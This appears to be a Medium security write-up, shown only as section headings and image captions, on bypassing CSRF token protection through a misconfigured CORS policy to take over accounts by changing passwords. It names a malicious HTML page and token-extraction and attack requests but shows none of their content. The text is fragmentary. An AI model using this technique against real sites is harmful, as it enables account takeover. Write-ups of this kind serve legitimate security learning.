Bypassing CSRF token protection by abusing a misconfigured CORS policy

CORS

Brief explanation of SOP, CORS and CSRF (skip if you know already)

https://example.com:4000/a/b.html?user=Alice&year=2019#part2

Understanding our target before the attack

main page
Registration as user/user
Login request. Not important
Logged in and Change Password page
CSRF token in html form
Change password request
Change password response
Change password request testing CORS vuln
Change password response testing CORS vuln

The Attack

Wrapping everything up!

Malicious.html
Complete attack requests
2nd request. CSRF Token extraction request
2nd Request Response. CSRF Token extraction response
3rd Request. Actual CSRF attack with the token included and the password we chose!! ACCOUNT TAKEOVER

Final words

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store